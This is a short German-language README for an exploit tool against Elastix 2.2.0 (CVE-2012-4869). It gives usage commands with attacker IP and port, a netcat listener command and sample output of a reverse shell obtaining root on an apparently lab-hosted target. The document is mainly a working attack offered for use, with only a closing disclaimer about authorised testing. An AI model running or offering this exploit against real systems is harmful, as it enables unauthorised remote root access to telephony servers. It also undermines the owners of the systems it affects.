
Dieses Skript nutzt eine Local File Inclusion (LFI)-Schwachstelle in Elastix 2.2.0 aus, die Remote-Codeausführung (RCE) ermöglicht, indem Befehle über den callme_page.php-Endpunkt eingeschleust werden. Der Exploit basiert auf CVE-2012-4869.
requests-ModulInstalliere die Abhängigkeiten mit:
pip install requests
python exploit.py <URL> --LHOST <YOUR_IP> --LPORT <YOUR_PORT>
python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001
Starte vor der Ausführung des Exploits einen Netcat-Listener auf deinem Rechner:
nc -lvnp 9001
[*] Running Elastix 2.2.0 LFI Exploit - CVE-2012-4869
[*] Target: https://10.129.229.183
[*] Listening on 10.10.14.23:9001
[+] Exploit sent successfully, waiting for reverse shell...
[+] Connection from 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)
Dieser Exploit dient nur zu Bildungs- und autorisierten Sicherheitstestzwecken. Unbefugte Nutzung ist illegal. Der Autor ist nicht verantwortlich für den Missbrauch dieses Tools.